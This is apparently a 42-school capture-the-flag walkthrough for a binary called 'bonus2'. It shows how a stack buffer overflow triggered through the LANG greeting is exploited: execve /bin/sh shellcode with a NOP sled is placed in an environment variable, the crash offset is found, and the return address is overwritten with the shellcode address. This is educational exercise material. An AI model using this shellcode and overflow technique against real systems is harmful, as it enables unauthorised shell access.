# **************************************************************************** #
#                                                                              #
#                                                         :::      ::::::::    #
#    walkthrough                                        :+:      :+:    :+:    #
#                                                     +:+ +:+         +:+      #
#    By: lgarczyn <lgarczyn@student.42.fr>          +#+  +:+       +#+         #
#                                                 +#+#+#+#+#+   +#+            #
#    Created: 2019/05/08 08:36:26 by lgarczyn          #+#    #+#              #
#    Updated: 2019/05/08 11:16:28 by lgarczyn         ###   ########.fr        #
#                                                                              #
# **************************************************************************** #

The executable takes two arguments.
It will look in the environment for a LANG string, and greet the user (argv[1]) accordingly

fi => Hyvää päivää {USER}
nl => Goedemiddag! {USER}
_ => Hello {USER}

We add out shellcode to the env, and get its pointer

export A=`echo -e -n "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"`
export A=`echo -e -n "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"`$A
export A=`echo -e -n "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"`$A
export A=`echo -e -n "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"`$A

+- 0xbffff8bc

We run the executable with overflow test strings:

r ___0___1___2___3___4___5___6___7___8___9__a0__a1__a2__a3__a4__a5__a6__a7__a8__a9__b0__b1__b2__b3__b4__b5__b6__b7__b8__b9 \
	---0---1---2---3---4---5---6---7---8---9--a0--a1--a2--a3--a4--a5--a6--a7--a8--a9--b0--b1--b2--b3--b4--b5--b6--b7--b8--b9

We get a segfault on 0x2d2d342d or  "4---", but only if LANG == nl, otherwise the address is not fully written

export LANG=nl

We replace 4--- with our shellcode address, along with neighboring addresses

./bonus2 ___0___1___2___3___4___5___6___7___8___9__a0__a1__a2__a3__a4__a5__a6__a7__a8__a9__b0__b1__b2__b3__b4__b5__b6__b7__b8__b9 \
 ---`echo -e -n "\xbc\xf8\xff\xbf\xbc\xf8\xff\xbf\xbc\xf8\xff\xbf\xbc\xf8\xff\xbf\xbc\xf8\xff\xbf\xbc\xf8\xff\xbf\xbc\xf8\xff\xbf\xbc\xf8\xff\xbf"`

We clean up the command

./bonus2 __a0__a1__a2__a3__a4__a5__a6__a7__a8__a9  ---0---1---2---3---4---`echo -e -n "\xbc\xf8\xff\xbf"`